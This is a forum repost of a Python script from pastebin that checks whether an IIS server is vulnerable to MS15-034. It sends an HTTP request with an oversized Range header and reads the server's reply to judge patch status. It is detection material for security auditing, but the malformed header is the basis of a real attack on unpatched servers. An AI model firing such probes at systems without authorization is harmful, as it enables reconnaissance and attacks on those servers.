Nytro Posted April 16, 2015 Report Posted April 16, 2015 '''___. .___ __ __ \_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | |___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| \/ \/\/ \/ \/ \/ MS15-034 CheckerDanger! This script has not been properly qa'd and will probably fail in terrible ways.It is based off a change in HTTP!UlpParseRange in which an error code is returned as aresult of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range ofan HTTP range request.-BF8a8b2112 56 push esi8a8b2113 6a00 push 08a8b2115 2bc7 sub eax,edi8a8b2117 6a01 push 18a8b2119 1bca sbb ecx,edx8a8b211b 51 push ecx8a8b211c 50 push eax8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here'''import socketimport randomipAddr = ""hexAllFfff = "18446744073709551615"req1 = "GET / HTTP/1.0\r\n\r\n"req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"print "[*] Audit Started"client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)client_socket.connect((ipAddr, 80))client_socket.send(req1)boringResp = client_socket.recv(1024)if "Microsoft" not in boringResp: print "[*] Not IIS" exit(0)client_socket.close()client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)client_socket.connect((ipAddr, 80))client_socket.send(req)goodResp = client_socket.recv(1024)if "Requested Range Not Satisfiable" in goodResp: print "[!!] Looks VULN"elif " The request has an invalid header name" in goodResp: print "[*] Looks Patched"else: print "[*] Unexpected response, cannot discern patch status"Sursa: http://pastebin.com/raw.php?i=ypURDPc4 1 Quote
